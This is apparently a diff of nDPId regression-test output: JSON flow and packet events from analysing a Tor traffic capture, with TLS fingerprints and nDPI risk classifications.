01151{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1896,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822130889,"flow_last_seen":1383822131220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1139,"flow_avg_l4_payload_len":189,"midstream":0,"thread_ts_msec":1383822131220,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1919,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822132203,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1919,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822132203,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1919,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822132212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1919,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822132212}
00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":141,"flow_first_seen":1383821665420,"flow_last_seen":1383821774457,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60720,"flow_avg_l4_payload_len":430,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":141,"flow_first_seen":1383821665420,"flow_last_seen":1383821774457,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60720,"flow_avg_l4_payload_len":430,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":180000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":180000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821734359,"flow_last_seen":1383821734359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"157.56.30.46","src_port":51104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} 00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821734359,"flow_last_seen":1383821734359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"157.56.30.46","src_port":51104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}}
@@ -191,162 +191,162 @@
01047{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1383821666407,"flow_last_seen":1383821774461,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9246,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} 01047{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1383821666407,"flow_last_seen":1383821774461,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9246,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}}
01053{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1576,"flow_first_seen":1383821668403,"flow_last_seen":1383821774532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1301150,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} 01053{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1576,"flow_first_seen":1383821668403,"flow_last_seen":1383821774532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1301150,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}}
00683{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1383821673254,"flow_last_seen":1383822123915,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":720,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00683{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1383821673254,"flow_last_seen":1383822123915,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":720,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1937,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822133931,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1937,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822133931,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1937,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822134212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1937,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822134212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1944,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822134768,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1944,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822134768,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1944,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822136212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1944,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822136212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1945,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822134768,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1945,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822134768,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1945,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822138212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1945,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822138212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1946,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822134768,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1946,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822134768,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1946,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822140212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1946,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822140212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1947,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822134768,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1947,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822134768,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1947,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822142212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1947,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822142212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1948,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822134768,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1948,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822134768,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1948,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822144212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1948,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822144212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1949,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822134768,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1949,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822134768,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1949,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822146212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1949,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822146212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1950,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822134768,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1950,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822134768,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1950,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822148212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1950,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822148212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1951,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822134768,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1951,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822134768,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1951,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822150212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1951,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822150212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1952,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822134768,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1952,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822134768,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1952,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822152212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1952,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822152212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1954,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822153962,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1954,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822153962,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1954,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822154212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1954,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822154212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1955,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822153962,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1955,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822153962,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1955,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822156212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1955,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822156212}
